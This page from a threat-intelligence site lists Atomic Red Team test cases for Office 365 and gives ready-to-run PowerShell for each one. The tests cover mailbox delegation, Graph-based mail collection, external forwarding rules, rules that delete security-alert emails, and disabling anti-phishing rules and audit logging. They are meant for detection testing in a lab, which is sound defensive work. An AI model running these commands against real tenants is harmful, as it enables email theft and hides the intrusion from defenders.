Atomic Red Team test builder · threatengine.sh

Home/Atomic Tests

Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate

Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.

filter by technique id in the URL: /atomic?technique=T1059

▸

Matching tests · office-365

T1098.002 powershell office-365 EXO - Full access mailbox permission granted to a user

Additional Email Delegate Permissions

Give a nominated user, full mailbox delegation access of another user. This can be used by an adversary to maintain persistent access to a target's mailbox in M365.

Import-Module ExchangeOnlineManagement
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
Disconnect-ExchangeOnline -Confirm:$false

T1114.002 powershell office-365 Office365 - Remote Mail Collected

Remote Email Collection

Create and register an entra application that downloads emails from a tenant's Office 365 mailboxes using the Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information.

$ss = ConvertTo-SecureString "#{password}" -AsPlainText -Force
$cred = New-Object PSCredential -ArgumentList '#{username}', $ss
$param = @{
    Credential = $cred
    Force      = $true
}
$null = Connect-AzAccount @param
$token = (Get-AzAccessToken -ResourceTypeName MSGraph -ErrorAction Stop).token
$cert = New-SelfSignedCertificate -Subject "CN=PowerShell Application" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
$reqResourceAccess = ( @{ "resourceAccess" = (@{"id"= "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"; "type"= "Scope"}, @{ "id"= "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"; "type"= "Scope"}, @{"id"= "37f7f235-527c-4136-accd-4a02d197296e"; "type"= "Scope"}, @{"id"= "14dad69e-099b-42c9-810b-d002981feec1"; "type"= "Scope"}, @{ "id"= "e1fe6dd8-ba31-4d61-89e7-88639da4683d"; "type"= "Scope"}, @{ "id"= "810c84a8-4a9e-49e6-bf7d-12d183f40d01"; "type"= "Role"}); "resourceAppId" = "00000003-0000-0000-c000-000000000000" })
connect-mggraph -AccessToken $token
$context = Get-MgContext       
$users = get-MgUser
$app = New-MgApplication -DisplayName "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection" -RequiredResourceAccess $reqResourceAccess -Web @{ RedirectUris="http://localhost"; } -KeyCredentials @(@{ Type="AsymmetricX509Cert"; Usage="Verify"; Key=$cert.RawData })
New-MgServicePrincipal -AppId $app.appId -AdditionalProperties @{} | Out-Null
$resourceSPN = Get-MgServicePrincipal -Filter "AppId eq '$($app.AppId)'"
$graphApiApp = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$mailRole = $graphApiApp.AppRoles|Where-Object Value -Eq "Mail.Read"
New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $resourceSPN.Id -PrincipalId $resourceSPN.Id -ResourceId $graphApiApp.id -AppRoleId $mailRole.Id
$mailbox1 = "#{1st_target_mailbox}"
$mailbox2 = "#{2nd_target_mailbox}"
$mailbox3 = "#{3rd_target_mailbox}"
[System.Collections.ArrayList]$selectUsers = @()
foreach ($user in $users) {if (($user.Mail -eq $mailbox1) -Or ($user.Mail -eq $mailbox2) -Or ($user.Mail -eq $mailbox3)){$selectUsers.Add($user.id)}}
connect-mggraph -ClientId $app.AppId -TenantId $context.TenantId -CertificateName $cert.Subjectname.Name
foreach ($user in $selectUsers) { $url= "https://graph.microsoft.com/v1.0/users/$($user)/messages" ; Invoke-MgGraphRequest -Uri $url -Method GET -OutputType PSObject}

T1114.003 powershell office-365 Office365 - Email Forwarding

Email Forwarding Rule

Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"

T1564.008 powershell office-365 New-Inbox Rule to Hide E-mail in M365

Email Hiding Rules

This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body. Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true

T1685 powershell office-365 office-365-Disable-AntiPhishRule

Disable or Modify Tools

Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule

T1685.002 powershell office-365 Office 365 - Exchange Audit Log Disabled

Disable or Modify Cloud Log

You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False

T1685.002 powershell office-365 Office 365 - Set Audit Bypass For a Mailbox

Disable or Modify Cloud Log

Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin